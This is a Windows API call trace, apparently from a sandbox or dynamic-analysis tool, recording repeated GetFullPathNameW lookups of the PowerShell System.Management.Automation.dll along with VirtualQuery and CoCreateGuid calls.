	[0382.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.948] VirtualQuery (in: lpAddress=0x24b8f0, lpBuffer=0x24c7b0, dwLength=0x30 | out: lpBuffer=0x24c7b0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.949] VirtualQuery (in: lpAddress=0x24b8f0, lpBuffer=0x24c7b0, dwLength=0x30 | out: lpBuffer=0x24c7b0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.950] VirtualQuery (in: lpAddress=0x24b8f0, lpBuffer=0x24c7b0, dwLength=0x30 | out: lpBuffer=0x24c7b0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.950] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.950] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.950] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.951] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.951] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.951] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.951] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.951] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.951] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.952] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.952] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.952] VirtualQuery (in: lpAddress=0x24b520, lpBuffer=0x24c3e0, dwLength=0x30 | out: lpBuffer=0x24c3e0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.952] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.953] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.953] VirtualQuery (in: lpAddress=0x24b850, lpBuffer=0x24c710, dwLength=0x30 | out: lpBuffer=0x24c710*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.953] VirtualQuery (in: lpAddress=0x24b8e0, lpBuffer=0x24c7a0, dwLength=0x30 | out: lpBuffer=0x24c7a0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.953] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x88ddb014, Data2=0xc714, Data3=0x4e05, Data4=([0]=0xbd, [1]=0x35, [2]=0x64, [3]=0x94, [4]=0x81, [5]=0xaf, [6]=0x5c, [7]=0x7b))) returned 0x0
	[0382.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.954] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xbe6a2f51, Data2=0xd65f, Data3=0x410b, Data4=([0]=0xa6, [1]=0x5f, [2]=0xe4, [3]=0x17, [4]=0x6e, [5]=0x2a, [6]=0xb1, [7]=0x51))) returned 0x0
	[0382.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.957] VirtualQuery (in: lpAddress=0x24af50, lpBuffer=0x24be10, dwLength=0x30 | out: lpBuffer=0x24be10*(BaseAddress=0x24a000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.958] VirtualQuery (in: lpAddress=0x24af50, lpBuffer=0x24be10, dwLength=0x30 | out: lpBuffer=0x24be10*(BaseAddress=0x24a000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.958] VirtualQuery (in: lpAddress=0x24afe0, lpBuffer=0x24bea0, dwLength=0x30 | out: lpBuffer=0x24bea0*(BaseAddress=0x24a000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.958] VirtualQuery (in: lpAddress=0x24af50, lpBuffer=0x24be10, dwLength=0x30 | out: lpBuffer=0x24be10*(BaseAddress=0x24a000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.959] VirtualQuery (in: lpAddress=0x24afe0, lpBuffer=0x24bea0, dwLength=0x30 | out: lpBuffer=0x24bea0*(BaseAddress=0x24a000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24b660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.959] VirtualQuery (in: lpAddress=0x24af50, lpBuffer=0x24be10, dwLength=0x30 | out: lpBuffer=0x24be10*(BaseAddress=0x24a000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0382.960] VirtualQuery (in: lpAddress=0x24afe0, lpBuffer=0x24bea0, dwLength=0x30 | out: lpBuffer=0x24bea0*(BaseAddress=0x24a000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
